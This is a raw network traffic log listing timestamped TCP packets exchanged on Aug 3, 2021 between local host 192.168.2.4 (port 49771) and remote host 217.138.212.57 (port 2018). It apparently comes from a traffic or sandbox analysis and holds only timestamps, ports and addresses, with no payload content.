                              Aug 3, 2021 08:27:59.064603090 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.065483093 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.065821886 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.065836906 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.065891981 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.066371918 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.066386938 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.066426039 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.077778101 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.078032017 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.078409910 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.078520060 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.079093933 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.079142094 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.081734896 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.082555056 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.082652092 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.082981110 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.083653927 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.084119081 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.084916115 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.085508108 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.086100101 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.086167097 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.086221933 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.086343050 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.087347031 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.087536097 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.087618113 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.089523077 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.089540005 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.089968920 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.098397970 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.098412991 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.098985910 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.098999023 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.099056959 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.099081993 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.099597931 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.099612951 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.099895000 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.100095987 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.103764057 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.103835106 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.103871107 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.104306936 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.104320049 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.104360104 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.104832888 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.105021954 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.105278015 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.105370998 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.105443001 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.105597973 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.150897026 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.686285973 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.686419010 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.687150002 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.687423944 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.687478065 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.687499046 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.688621998 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.689125061 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.689378023 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.692122936 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.704193115 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.706058025 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.706213951 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.706401110 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.706497908 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.707607985 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.708050966 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.708290100 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.708827972 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.708944082 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.713366985 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.717955112 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.718653917 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.718959093 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.719105005 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.719156981 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.721807003 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.723269939 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.724567890 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.724706888 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.726097107 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.733216047 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.733546019 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.742741108 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.743761063 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.743915081 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.744151115 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.744563103 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.745119095 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.746093988 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.746196985 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.746225119 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.746279001 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.750252962 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.750288963 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.750313997 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.750437975 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.750720978 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.750804901 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.750828028 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.750830889 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.751275063 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.751403093 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.752629042 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.753504038 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.753665924 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.754075050 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.754702091 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.755228043 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.756278992 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.756289005 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.756357908 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.756571054 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.758263111 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.758595943 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.758878946 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.759166002 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.759203911 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.759354115 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.759560108 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.760149002 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.760818958 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:27:59.761168003 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:27:59.809087992 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.311570883 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.312720060 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.313015938 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.313277960 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.313358068 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.313386917 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.313661098 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.314306974 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.316323996 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.322700024 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.322813988 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.323009968 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.323153019 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.323381901 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.323640108 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.324127913 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.324333906 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.324462891 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.325102091 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.333233118 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.333378077 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.333518982 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.333941936 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.334187984 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.343494892 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.343713045 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.343935013 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.344033003 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.344240904 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.345022917 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.345330954 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.345601082 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.347243071 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.359194040 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.360997915 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.361243010 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.361682892 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.361763000 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.361788034 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.362083912 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.363101006 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.363284111 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.364196062 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.364422083 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.365171909 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.365525007 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.365586042 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.365605116 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.366146088 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.369277000 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.370457888 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.370803118 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.370865107 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.370888948 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.371766090 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.372165918 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.372410059 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.372505903 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.373164892 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.374231100 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.374438047 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.374489069 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.374502897 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.375010014 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.376132965 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.376422882 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.377398968 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.377908945 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.379079103 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.379935026 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.380004883 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.380022049 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.380109072 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.380466938 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.383538008 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.389175892 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.389766932 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.390052080 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.390202999 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.411253929 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.411354065 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.926240921 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.926450968 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.927108049 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.927151918 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.929187059 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.929478884 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.935204983 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.944274902 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.944665909 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.945501089 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.945722103 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.945828915 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.946106911 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.946381092 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.946481943 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.947309017 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.948668003 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.948877096 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.948892117 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.949162006 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.949263096 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.949559927 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.950160027 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.950283051 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.950417042 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.951085091 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.951242924 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.956242085 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.959268093 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.959892035 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.960401058 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.960638046 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.961616993 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.974169016 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.975110054 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.975406885 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.975461960 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.976315975 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.977108002 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.978127956 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.978244066 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.978545904 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.978698015 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.979306936 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.979413986 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.980314016 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.980417013 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.980585098 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.984239101 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.985224962 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.985322952 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.985382080 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.986145020 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.986228943 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.990124941 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.990453959 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.991100073 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.991458893 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.992136002 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.992185116 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.992486000 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.993657112 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.993716955 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.994132042 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.995059967 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.995451927 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.996053934 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:00.996153116 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:00.996171951 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:01.059931993 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:01.700494051 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:05.032421112 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:05.044286966 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:05.691235065 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:05.900218964 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:05.948393106 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:06.544205904 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:06.590967894 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:07.547663927 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:08.216505051 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:09.599663973 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:10.046778917 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:10.049717903 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:10.296256065 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:10.712364912 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:10.761288881 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:11.369467020 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:11.417753935 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:11.681647062 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:12.070353031 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:12.071213007 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:12.494294882 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:12.495265961 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:13.174438953 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:13.176184893 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:13.877274990 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:14.848794937 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:15.047900915 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:15.090204954 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:15.484452009 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:17.828206062 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:18.575824022 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:18.651921988 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:18.700380087 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:19.330172062 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:19.330291033 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:20.061678886 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:20.106751919 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:20.767349958 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:20.767898083 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:22.935170889 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:23.707376003 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:25.069304943 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:25.121841908 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:25.764211893 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:25.764292955 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:26.713725090 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:26.763310909 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:27.393297911 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:27.393404007 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:28.761111975 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:29.465604067 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:30.066904068 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:30.122335911 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:30.755209923 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:30.755578041 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:34.782016993 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:34.826241016 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:35.046123028 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:35.449649096 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:35.449847937 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:35.902803898 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:35.903351068 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:36.118191004 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:40.089170933 CEST201849771217.138.212.57192.168.2.4
                              Aug 3, 2021 08:28:40.138752937 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:40.788785934 CEST497712018192.168.2.4217.138.212.57
                              Aug 3, 2021 08:28:41.061777115 CEST201849771217.138.212.57192.168.2.4
